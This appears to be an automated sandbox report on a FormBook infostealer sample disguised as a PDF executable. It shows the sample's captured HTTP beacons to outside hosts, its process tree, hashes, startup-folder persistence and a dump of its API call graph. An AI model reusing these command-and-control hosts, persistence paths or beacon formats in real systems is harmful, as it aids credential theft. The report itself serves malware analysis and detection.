Nov 19, 2024 03:57:08.949137926 CET | 459 | OUT | GET /s8dp/?5lf8fv8H=rltVgnxG7skGUaMKpVhyEPF4v5Ox4an8JStNzNQrUbrzak/EOBCVCfZgcjG6plEiD8Vg4P/IIwGC19xvtxAv8Aa2yBIi9XmnoCp9ndMs1wSssRnKGiU00wY=&AjEdl=yJNdk0d HTTP/1.1
                                                  Host: www.vpnto.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50020 | 104.21.15.100 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:57:15.172544956 CET | 736 | OUT | POST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 205
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Ascii: 5lf8fv8H=TvsSK3H3o3MgIA1P5FXO4yCLhYdlwwwTqvCz//qpsZ/soZBAUQpv0gYY+YRXF/lG0R+87CmZ/tjyL8wq9dWnj/T+K6+ucCzNP+3z43Jl1Jmx0KGidwKSKi+XQGqn5oKSudrNknLiUkA/KeNxWfaD665kXRRmqm4RmyryGVdvUrVu0v52Asg0gkV67Y7sWVOKmw==
Nov 19, 2024 03:57:16.067656040 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:15 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eW2N2N0kEeseMyevRcKJ%2F18ECavgrhHOiagG1IYGcR5PXqexMI5QjcFDY0zwtZE1T%2F0vS7vGThnTrWaqO94BHfSVCY0qx4ReNOxQu1vOtyJ8yKNXpIsWK4AsPqJWpTiY2VbLi8Z%2FOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4cee89ed06090c-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1872&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=736&delivery_rate=0&cwnd=200&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50021 | 104.21.15.100 | 80 | 4628 | C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 19, 2024 03:57:17.729649067 CET | 756 | OUT | POST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 225
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Data Ascii: 5lf8fv8H=TvsSK3H3o3MgJhFP+mPO+SCEt4dl6QwXqv+z/+firsnsp4xAVU9v3gYYtYRSGPld0R6O7DqZ/tHyL9Aq9MWkjvT8eK+sSizNP+3z43cK1NCx062idUedJi+IRGqnq4KWudqoklvYUm4/Kf9xWtyEjK5YaxQi7EMenDmxHkJqV41Q8J0sRdBjykxJmfyYbWzD975BRdUJsYoHz9G6ryxWqzI=
Nov 19, 2024 03:57:18.626359940 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:18 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JIwqUyEpxgRKe7HevT5kVNPZvOH0NBarFRHqvF1Z1ARnwXt9Y0mKr5LHjRMUgAy45x6QHCmfkf%2Bou66e6zGWENEfJO%2B3rmDnk0FvbmfJk8gEP50m6VBG%2FfFzCmI2BaSbFoj%2BvsTytg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4cee99eaa20fbb-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1467&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=756&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendl


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                  15 | 192.168.2.4 | 50022 | 104.21.15.100 | 80
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  Nov 19, 2024 03:57:20.672945023 CET | 10838 | OUT | POST /6o0x/ HTTP/1.1
                                                  Host: www.sitioseguro.blog
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                  Accept-Encoding: gzip, deflate
                                                  Accept-Language: en-us
                                                  Connection: close
                                                  Content-Length: 10305
                                                  Cache-Control: no-cache
                                                  Content-Type: application/x-www-form-urlencoded
                                                  Origin: http://www.sitioseguro.blog
                                                  Referer: http://www.sitioseguro.blog/6o0x/
                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                  Nov 19, 2024 03:57:21.584063053 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                  Date: Tue, 19 Nov 2024 02:57:21 GMT
                                                  Content-Type: text/html
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6Q5UKb0nOWUMNHYum7J2hT2HmXWLlDLK5BSLnLSV%2BBiTtpn0ghCds7jJmrOGkhX30cnMaAeE%2F3wmvQZefhy20lFn%2BfMfAkImV4549OOz2HDTtBCd1lAQuk48P72%2BNjrsjCZ5On8LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8e4ceeac4801cb92-LAX
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10838&delivery_rate=0&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome frie
                                                  Nov 19, 2024 03:57:21.584112883 CET | 95 | IN
                                                  Data Ascii: ndly error page -->... a padding to disable MSIE and Chrome friendly error page -->0



                                                  Target ID:0
                                                  Start time:21:55:10
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0x340000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:21:55:12
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0xce0000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Joe Sandbox ML
                                                  • Detection: 76%, ReversingLabs
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:21:55:14
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe"
                                                  Imagebase:0x640000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:21:55:25
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs"
                                                  Imagebase:0x7ff75e2b0000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:21:55:25
                                                  Start date:18/11/2024
                                                  Path:C:\Users\user\AppData\Local\retrofit\cunila.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\retrofit\cunila.exe"
                                                  Imagebase:0xce0000
                                                  File size:1'189'888 bytes
                                                  MD5 hash:8E38E2141423C1BDF6899EF2AAF078F8
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:7
                                                  Start time:21:55:27
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\retrofit\cunila.exe"
                                                  Imagebase:0x640000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:21:55:51
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe"
                                                  Imagebase:0x5f0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:10
                                                  Start time:21:55:54
                                                  Start date:18/11/2024
                                                  Path:C:\Windows\SysWOW64\upnpcont.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\upnpcont.exe"
                                                  Imagebase:0x240000
                                                  File size:35'328 bytes
                                                  MD5 hash:B0B77651795747C81A50BEFA60922B8E
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:11
                                                  Start time:21:56:09
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe"
                                                  Imagebase:0x5f0000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:13
                                                  Start time:21:56:21
                                                  Start date:18/11/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff6bf500000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true


                                                    Execution Graph

                                                    Execution Coverage:3.7%
                                                    Dynamic/Decrypted Code Coverage:0.4%
                                                    Signature Coverage:10.4%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:171
__call_reportfault 92940->92941 92942 366cef IsDebuggerPresent 92941->92942 92948 3681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 92942->92948 92945 366db3 __call_reportfault 92949 36a70c 92945->92949 92946 366dd6 92947 368197 GetCurrentProcess TerminateProcess 92946->92947 92947->92939 92948->92945 92950 36a716 IsProcessorFeaturePresent 92949->92950 92951 36a714 92949->92951 92953 3737b0 92950->92953 92951->92946 92956 37375f 5 API calls 2 library calls 92953->92956 92955 373893 92955->92946 92956->92955 92957->92840 92959 367cf4 __lock 47 API calls 92958->92959 92960 361410 92959->92960 93023 367e58 LeaveCriticalSection 92960->93023 92962 343a88 92963 36146d 92962->92963 92964 361477 92963->92964 92965 361491 92963->92965 92964->92965 93024 367c0e 47 API calls __getptd_noexit 92964->93024 92965->92848 92967 361481 93025 366e10 8 API calls __Wcsftime_l 92967->93025 92969 36148c 92969->92848 92970->92850 92972 343d26 __ftell_nolock 92971->92972 92973 34d7f7 48 API calls 92972->92973 92974 343d31 GetCurrentDirectoryW 92973->92974 93026 3461ca 92974->93026 92976 343d57 IsDebuggerPresent 92977 343d65 92976->92977 92978 3b1cc1 MessageBoxA 92976->92978 92979 343e3a 92977->92979 92981 3b1cd9 92977->92981 92982 343d82 92977->92982 92978->92981 92980 343e41 SetCurrentDirectoryW 92979->92980 92984 343e4e Mailbox 92980->92984 93203 35c682 48 API calls 92981->93203 93100 3440e5 92982->93100 92984->92852 92986 3b1ce9 92991 3b1cff SetCurrentDirectoryW 92986->92991 92988 343da0 GetFullPathNameW 92989 346a63 48 API calls 92988->92989 92990 343ddb 92989->92990 93116 346430 92990->93116 92991->92984 92994 343df6 92995 343e00 92994->92995 93204 3871fa AllocateAndInitializeSid CheckTokenMembership FreeSid 92994->93204 93132 343e6e GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 92995->93132 92998 3b1d1c 92998->92995 93001 3b1d2d 92998->93001 93003 345374 50 API calls 93001->93003 93002 343e0a 93004 343e1f 93002->93004 93201 344ffc 67 API calls _memset 
93002->93201 93006 3b1d35 93003->93006 93140 34e8d0 93004->93140 93009 34ce19 48 API calls 93006->93009 93010 3b1d42 93009->93010 93012 3b1d49 93010->93012 93013 3b1d6e 93010->93013 93015 34518c 48 API calls 93012->93015 93014 34518c 48 API calls 93013->93014 93017 3b1d6a GetForegroundWindow ShellExecuteW 93014->93017 93016 3b1d54 93015->93016 93018 34510d 48 API calls 93016->93018 93021 3b1d9e Mailbox 93017->93021 93020 3b1d61 93018->93020 93022 34518c 48 API calls 93020->93022 93021->92979 93022->93017 93023->92962 93024->92967 93025->92969 93205 35e99b 93026->93205 93030 3461eb 93031 345374 50 API calls 93030->93031 93032 3461ff 93031->93032 93033 34ce19 48 API calls 93032->93033 93034 34620c 93033->93034 93222 3439db 93034->93222 93036 346216 Mailbox 93037 346eed 48 API calls 93036->93037 93038 34622b 93037->93038 93234 349048 93038->93234 93041 34ce19 48 API calls 93042 346244 93041->93042 93237 34d6e9 93042->93237 93044 346254 Mailbox 93045 34ce19 48 API calls 93044->93045 93046 34627c 93045->93046 93047 34d6e9 55 API calls 93046->93047 93048 34628f Mailbox 93047->93048 93049 34ce19 48 API calls 93048->93049 93050 3462a0 93049->93050 93241 34d645 93050->93241 93052 3462b2 Mailbox 93053 34d7f7 48 API calls 93052->93053 93054 3462c5 93053->93054 93251 3463fc 93054->93251 93058 3462df 93059 3b1c08 93058->93059 93060 3462e9 93058->93060 93061 3463fc 48 API calls 93059->93061 93062 360fa7 _W_store_winword 59 API calls 93060->93062 93063 3b1c1c 93061->93063 93064 3462f4 93062->93064 93066 3463fc 48 API calls 93063->93066 93064->93063 93065 3462fe 93064->93065 93067 360fa7 _W_store_winword 59 API calls 93065->93067 93068 3b1c38 93066->93068 93069 346309 93067->93069 93071 345374 50 API calls 93068->93071 93069->93068 93070 346313 93069->93070 93072 360fa7 _W_store_winword 59 API calls 93070->93072 93073 3b1c5d 93071->93073 93074 34631e 93072->93074 93076 3463fc 48 API calls 93073->93076 93075 34635f 93074->93075 93077 3b1c86 93074->93077 93080 3463fc 48 API calls 
93074->93080 93075->93077 93078 34636c 93075->93078 93079 3b1c69 93076->93079 93081 346eed 48 API calls 93077->93081 93267 35c050 93078->93267 93082 346eed 48 API calls 93079->93082 93083 346342 93080->93083 93084 3b1ca8 93081->93084 93086 3b1c77 93082->93086 93087 346eed 48 API calls 93083->93087 93088 3463fc 48 API calls 93084->93088 93090 3463fc 48 API calls 93086->93090 93091 346350 93087->93091 93092 3b1cb5 93088->93092 93089 346384 93278 351b90 93089->93278 93090->93077 93094 3463fc 48 API calls 93091->93094 93092->93092 93094->93075 93095 351b90 48 API calls 93097 346394 93095->93097 93097->93095 93098 3463fc 48 API calls 93097->93098 93099 3463d6 Mailbox 93097->93099 93294 346b68 48 API calls 93097->93294 93098->93097 93099->92976 93101 3440f2 __ftell_nolock 93100->93101 93102 3b370e _memset 93101->93102 93103 34410b 93101->93103 93105 3b372a GetOpenFileNameW 93102->93105 93104 34660f 49 API calls 93103->93104 93106 344114 93104->93106 93107 3b3779 93105->93107 93821 3440a7 93106->93821 93110 346a63 48 API calls 93107->93110 93112 3b378e 93110->93112 93112->93112 93113 344129 93839 344139 93113->93839 93117 34643d __ftell_nolock 93116->93117 94049 344c75 93117->94049 93119 346442 93131 343dee 93119->93131 94060 345928 86 API calls 93119->94060 93121 34644f 93121->93131 94061 345798 88 API calls Mailbox 93121->94061 93123 346458 93124 34645c GetFullPathNameW 93123->93124 93123->93131 93125 346a63 48 API calls 93124->93125 93126 346488 93125->93126 93127 346a63 48 API calls 93126->93127 93128 346495 93127->93128 93129 346a63 48 API calls 93128->93129 93130 3b5dcf _wcscat 93128->93130 93129->93131 93131->92986 93131->92994 93133 3b1cba 93132->93133 93134 343ed8 93132->93134 94103 344024 93134->94103 93138 343e05 93139 3436b8 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 93138->93139 93139->93002 93141 34e8f6 93140->93141 93165 34e906 Mailbox 93140->93165 93142 34ed52 93141->93142 93141->93165 94278 35e3cd 335 API calls 93142->94278 93143 38cc5c 86 API 
calls 93143->93165 93144 34ebc7 93146 343e2a 93144->93146 94279 342ff6 16 API calls 93144->94279 93146->92979 93202 343847 Shell_NotifyIconW _memset 93146->93202 93148 34ed63 93148->93146 93150 34ed70 93148->93150 93149 34e94c PeekMessageW 93149->93165 94280 35e312 335 API calls Mailbox 93150->94280 93152 34ed77 LockWindowUpdate DestroyWindow GetMessageW 93152->93146 93155 34eda9 93152->93155 93153 3b526e Sleep 93153->93165 93156 3b59ef TranslateMessage DispatchMessageW GetMessageW 93155->93156 93156->93156 93158 3b5a1f 93156->93158 93158->93146 93159 34ed21 PeekMessageW 93159->93165 93160 341caa 49 API calls 93160->93165 93161 34ebf7 timeGetTime 93161->93165 93163 35f4ea 48 API calls 93163->93165 93164 346eed 48 API calls 93164->93165 93165->93143 93165->93144 93165->93149 93165->93153 93165->93159 93165->93160 93165->93161 93165->93163 93165->93164 93166 34ed3a TranslateMessage DispatchMessageW 93165->93166 93167 3b5429 Mailbox 93165->93167 93168 3b5557 WaitForSingleObject 93165->93168 93171 3b588f Sleep 93165->93171 93172 34edae timeGetTime 93165->93172 93175 3b5733 Sleep 93165->93175 93178 342aae 311 API calls 93165->93178 93183 3b5445 Sleep 93165->93183 93199 34ce19 48 API calls 93165->93199 93200 34d6e9 55 API calls 93165->93200 94108 34ef00 93165->94108 94113 34f110 93165->94113 94178 3545e0 93165->94178 94195 35e244 93165->94195 94200 35dc5f 93165->94200 94205 34eed0 335 API calls Mailbox 93165->94205 94206 353200 93165->94206 94282 3a8d23 48 API calls 93165->94282 94286 34fe30 93165->94286 93166->93159 93167->93165 93170 34d7f7 48 API calls 93167->93170 93177 3b5926 GetExitCodeProcess 93167->93177 93180 35dc38 timeGetTime 93167->93180 93167->93183 93184 3b5432 Sleep 93167->93184 93185 3a8c4b 108 API calls 93167->93185 93186 342c79 107 API calls 93167->93186 93188 3b59ae Sleep 93167->93188 93189 34ce19 48 API calls 93167->93189 93193 34d6e9 55 API calls 93167->93193 94283 384cbe 49 API calls Mailbox 93167->94283 94284 341caa 49 API calls 93167->94284 94285 
342aae 335 API calls 93167->94285 94315 39ccb2 50 API calls 93167->94315 94316 387a58 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 93167->94316 94317 386532 63 API calls 3 library calls 93167->94317 93168->93165 93169 3b5574 GetExitCodeProcess CloseHandle 93168->93169 93169->93165 93170->93167 93171->93167 94281 341caa 49 API calls 93172->94281 93175->93167 93181 3b593c WaitForSingleObject 93177->93181 93182 3b5952 CloseHandle 93177->93182 93178->93165 93180->93167 93181->93165 93181->93182 93182->93167 93183->93165 93184->93183 93185->93167 93186->93167 93188->93165 93189->93167 93193->93167 93199->93165 93200->93165 93201->93004 93202->92979 93203->92986 93204->92998 93206 34d7f7 48 API calls 93205->93206 93207 3461db 93206->93207 93208 346009 93207->93208 93209 346016 __ftell_nolock 93208->93209 93210 346a63 48 API calls 93209->93210 93214 34617c Mailbox 93209->93214 93212 346048 93210->93212 93221 34607e Mailbox 93212->93221 93295 3461a6 93212->93295 93213 3461a6 48 API calls 93213->93221 93214->93030 93215 34614f 93215->93214 93216 34ce19 48 API calls 93215->93216 93218 346170 93216->93218 93217 34ce19 48 API calls 93217->93221 93219 3464cf 48 API calls 93218->93219 93219->93214 93220 3464cf 48 API calls 93220->93221 93221->93213 93221->93214 93221->93215 93221->93217 93221->93220 93298 3441a9 93222->93298 93225 343a06 93225->93036 93228 3b2ff0 93230 361c9d _free 47 API calls 93228->93230 93231 3b2ffd 93230->93231 93232 344252 84 API calls 93231->93232 93233 3b3006 93232->93233 93233->93233 93235 35f4ea 48 API calls 93234->93235 93236 346237 93235->93236 93236->93041 93238 34d6f4 93237->93238 93239 34d71b 93238->93239 93810 34d764 55 API calls 93238->93810 93239->93044 93242 34d654 93241->93242 93250 34d67e 93241->93250 93243 34d65b 93242->93243 93247 34d6c2 93242->93247 93244 34d6ab 93243->93244 93245 34d666 93243->93245 93244->93250 93812 35dce0 53 API calls 93244->93812 93811 34d9a0 53 API calls __cinit 93245->93811 
93247->93244 93813 35dce0 53 API calls 93247->93813 93250->93052 93252 346406 93251->93252 93253 34641f 93251->93253 93255 346eed 48 API calls 93252->93255 93254 346a63 48 API calls 93253->93254 93256 3462d1 93254->93256 93255->93256 93257 360fa7 93256->93257 93258 360fb3 93257->93258 93259 361028 93257->93259 93266 360fd8 93258->93266 93814 367c0e 47 API calls __getptd_noexit 93258->93814 93816 36103a 59 API calls 3 library calls 93259->93816 93262 361035 93262->93058 93263 360fbf 93815 366e10 8 API calls __Wcsftime_l 93263->93815 93265 360fca 93265->93058 93266->93058 93268 35c064 93267->93268 93270 35c069 Mailbox 93267->93270 93817 35c1af 48 API calls 93268->93817 93276 35c077 93270->93276 93818 35c15c 48 API calls 93270->93818 93272 35f4ea 48 API calls 93273 35c108 93272->93273 93275 35f4ea 48 API calls 93273->93275 93274 35c152 93274->93089 93277 35c113 93275->93277 93276->93272 93276->93274 93277->93089 93277->93277 93279 351cf6 93278->93279 93282 351ba2 93278->93282 93279->93097 93280 351bae 93287 351bb9 93280->93287 93820 35c15c 48 API calls 93280->93820 93282->93280 93283 35f4ea 48 API calls 93282->93283 93284 3b49c4 93283->93284 93285 35f4ea 48 API calls 93284->93285 93293 3b49cf 93285->93293 93286 351c5d 93286->93097 93287->93286 93288 35f4ea 48 API calls 93287->93288 93289 351c9f 93288->93289 93290 351cb2 93289->93290 93819 342925 48 API calls 93289->93819 93290->93097 93292 35f4ea 48 API calls 93292->93293 93293->93280 93293->93292 93294->93097 93296 34bdfa 48 API calls 93295->93296 93297 3461b1 93296->93297 93297->93212 93363 344214 93298->93363 93303 3441d4 LoadLibraryExW 93373 344291 93303->93373 93304 3b4f73 93306 344252 84 API calls 93304->93306 93308 3b4f7a 93306->93308 93310 344291 3 API calls 93308->93310 93311 3b4f82 93310->93311 93399 3444ed 93311->93399 93312 3441fb 93312->93311 93313 344207 93312->93313 93315 344252 84 API calls 93313->93315 93317 3439fe 93315->93317 93317->93225 93322 38c396 93317->93322 93319 3b4fa9 93407 344950 
